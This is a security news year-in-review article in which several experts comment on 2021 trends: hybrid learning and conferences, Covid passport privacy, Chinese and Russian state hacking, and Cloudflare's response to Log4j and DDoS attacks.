Swig Security Review 2021 – Part II

Key thinkers on the biggest security stories and trends in 2021

In Part I of our 2021 year in review published yesterday, experts discussed everything from the biggest ransomware attacks to why diversity is paramount to tackling the growing workforce gap.

The impact of the coronavirus pandemic was a recurrent topic, and surfaces again in Part II, as YouTube educator Katie Paxton-Fear argues that remote learning has improved accessibility across the infosec industry, a view echoed by Black Hat general manager Steve Wylie.

Other key topics include the cyber warfare landscape for 2022 and a look back at the main trends of 2021, the latter half of which was dominated by the landmark Log4j vulnerability.

Join us for Part II as we ask more security experts to sum up their 2021 and expectations for the year ahead.

Remote learning is improving diversity across the industry

Katie Paxton-Fear, cybersecurity lecturer at Manchester Metropolitan University and YouTube educator (InsiderPhD)

One thing 2021 and 2020 showed is how much we still struggle to do security ‘right’ – there’s always a trade-off between convenience, cost, and security. Covid-19 will be remembered as a time of quick change and reactivity, but this year we have settled into hybrid life.

While a lot of people will look at hybrid conferences and events and feel something is missing – the chats near the sandwich buffet table, the running into someone by the coffee shop – it’s important to realise that security has become more accessible as a result.

The current status quo has driven what is being described as the ‘great resignation’ as workers look for hybrid or remote roles.

Katie Paxton-Fear

 Read the Swig Security Review 2021 – Part I here

This accessibility is enabling individuals who were interested in security to consider pursuing a career in the field, as people have been skilling up with certifications and by trying to make a bit of extra cash through bug bounty hunting.

Where suddenly the best security knowledge was restricted to those who could afford a plane ticket to Vegas for DEFCON, now all you need is a free Twitch stream.

As we see vaccines rolled out worldwide, I hope this part of the pandemic – the great equaliser if you will – sticks around. We can learn so much from the diversity in security and hybrid has really enabled personal growth.

I echo the sentiments of many governments worldwide in the wake of the pandemic – we must look towards education, and I hope those who have found a passion in security over the pandemic find a career in 2022.

The pandemic has taught us a lot about what it means to be resilient, as individuals, as businesses, as governments, and as society at large, and while we are still reeling from the past two years, combined with anxiety for the future, we can admit we don’t know what to do – but we will overcome it.

Follow Katie on Twitter.

Are Covid-19 passports here to stay?

Professor Alan Woodward, computer scientist at the University of Surrey, and expert in the privacy implications of Covid-related contact tracing

From the app/technology perspective, I think the UK Covid alert app and vaccine passport are as good as they’re going to get.

Personally I don’t see any issues with privacy from a technical perspective. The app that runs on people’s phones or mobile devices to check the Covid passport looks fine – it passes nothing that can identify the individual and is ephemeral on the scanning device anyway.

Of course, that leaves the bigger question about whether the government should be making these ‘passports’ mandatory and, to my mind, who is actually going to police this.

Behind the scenes on that Covid alert app, something very interesting happened.

Alan Woodward

Apple and Google ended up adopting some of the better parts of the NHS algorithms, while not abandoning the fundamental privacy design.

We’ve ended up with a very good piece of technology. But that technology is only as useful as the parameters set by the government.

Follow Alan on Twitter.

All eyes on China and Russia

Charity Wright, former NSA Chinese espionage expert and threat intelligence analyst at Recorded Future

We started 2021 the way we will start 2022 – with all eyes on China and Russia. Over the past several years, cybersecurity and geopolitics have become inherently intertwined, and this will be a focus for intelligence requirements going into the new year.

At the beginning of 2021, Russia had the cybersecurity industry reeling from the SolarWinds intrusion, as we determined the scope and impact of the incident across the world.

In February, Recorded Future discovered a Chinese state-sponsored group called RedEcho in the networks of India’s power grid.

Charity Wright

A few months later, with the risks of global digital supply chains still in the spotlight, we learned that China’s Hafnium group had infiltrated Microsoft Exchange servers and pilfered data from thousands of private and public sector organizations around the world in one of the worst cyber-espionage campaigns witnessed to date.

Throughout the year, Russia-based ransomware gangs wreaked havoc on organizations everywhere, prompting President Biden to demand that President Putin make cybercriminals in Russia accountable for their actions.

But not all was lost. Crime fighters have made thousands of arrests and recovered millions in ransomware payments, governments have issued indictments, intelligence agencies are working closer with the private sector, and the general public is starting to become more aware of cybersecurity and malign foreign influence.

YOU MIGHT LIKE SolarWinds hack: Nation-state attackers could have launched supply chain attack nine months earlier than previously thought

In 2022, geopolitical intelligence will become a new requirement for many corporations, militaries, and governments, as they become more aware of how geopolitical instability and major events like Covid-19 disrupts global business. State-sponsored cyber-attacks and influence operations will increase unless exposed and disincentivized through joint intelligence efforts and joint actions. 

My guess is that the new year will start with Russia targeting Ukraine with cyber espionage operations for pre-invasion intelligence. NATO and its member countries should also be on high alert for Russian espionage.

Tensions between the US and China will continue to escalate as President Xi Jinping is emboldened by the full confidence of the Communist Party of China and Beijing’s growing list of allies in Latin America and Africa.

As China-native technology companies expand their digital presence in foreign countries, Beijing will enjoy new digital landscapes for cyber espionage objectives. Along with their Digital Silk Road projects, China will continue to use its propaganda system to push anti-US and pro-China narratives, which will contribute to Beijing’s long-term objective of creating a world more friendly to the Communist Party.

Follow Charity on Twitter.

Moving to a hybrid model has changed infosec conferences forever

Steve Wylie, general manager for Black Hat events

We are nearly two years on from the onset of Covid-19 and the global pandemic that ensued. It has a been an especially difficult time for the conference business – an industry which trades on human interaction and engagement. But many conferences have also learned from this experience and adapted to continue to serve their communities in meaningful ways.

In fact, the past two years have shown us just how creative and resilient we can be. Yet the challenges we faced in 2020 seemed insurmountable at the time.

Conference organizers large and small scrambled to establish their events on virtual platforms. Some were successful – most were not.

Replicating the Black Hat experience in a digital format seemed impossible. But with a lot of planning, great partners, and a little bit of luck, we pulled it off.

Steve Wylie

Little did we know that 2020 and our year of virtual events would be just a warm-up for 2021 and the future of events.

Today, conference organizers are managing for uncertainty as the world slowly returns to in-person events. Will in-person events be allowed, and at what scale? What healthcare guidelines will be in place at the time of the event? Will our community – our speakers, trainers, delegates, and sponsors – want to meet in person or continue to participate from afar?

These are challenges we will continue to face and must plan for. But we must also embrace the benefits of digital and our learnings from these past two years.

For Black Hat, we believe our future will be in-person and virtual. Nothing beats the experience of in-person interaction and engagement. The past two years have shown us that as we isolated from co-workers, customers, family, and friends.

But virtual events also have proven merit. They expand accessibility for conference goers who cannot travel due to cost or time away from the home and office. We saw this at Black Hat USA this year with delegate representation from 140 countries compared with 112 countries at our last in-person event. Making conferences available to a global, online audience brings our communities together like never before.

Anyone who has attended a conference with multiple tracks has also faced the dilemma of choosing which sessions to miss out on. By extending conference sessions to a virtual platform, delegates can experience the whole conference at their own pace. This brings conference delegates tremendous value that they will want to keep as in-person events return.

I believe this past two years has forever changed the conference world – hopefully for the good.

Follow Steve on Twitter.

Log4j has reminded us that security doesn’t take a holiday

John Engates, field CTO at Cloudflare

The recent emergence of a vulnerability in Log4j has reminded us that security doesn’t take a holiday. The response to the Log4j CVE was rapid across the industry. At Cloudflare, we were well-positioned to help mitigate Log4Shell and buy customers some precious time.

Upon learning exactly how the Log4j vulnerability worked and how attackers could exploit it, Cloudflare immediately updated our WAF (web application firewall) rules to help protect against it.

In addition, we provided our customers with the option of sanitising any logs sent from Cloudflare to help further mitigate the Log4j vulnerability.

John Engates

This was also an extremely busy year for DDoS attacks. Cloudflare mitigated record-setting HTTP DDoS attacks, terabit-strong network-layer attacks, and one of the largest botnets ever deployed (Meris).

We observed and mitigated a number of ransom DDoS attacks on voice over IP (VoIP) service providers and their network infrastructure around the world.

The threat of phishing and ransomware attacks are also topics of great concern for most CIOs and CISOs. Zero Trust is the trend that gives me the most hope in mitigating security threats to businesses. And Zero Trust is now a part of almost every conversation with customers and prospects.

DNS may not immediately come to mind in the context of cybersecurity, but it’s a critical service to most companies. This year, some of the highest-profile outages were partially due to problems accessing DNS servers.

Companies can also use DNS to thwart cyber-attacks by preventing DNS lookups on known malware or phishing domains. Some Log4j attacks relied on DNS lookups to call home. DNS can potentially mitigate attacks like Log4Shell and others, while also providing important analytics about attacks.

DON'T MISS ‘Log4Shell’ vulnerability poses critical threat to applications using ‘ubiquitous’ Java logging package Apache Log4j

The internet becomes the corporate network. Zero Trust is the security architecture that helps mitigate all kinds of threats. And SaaS enables CIOs and CISOs to implement and maintain their security infrastructure during an era of supply chain constraints and a talent war.

DON’T FORGET TO READ Read Part I of the Swig Security Review 2021.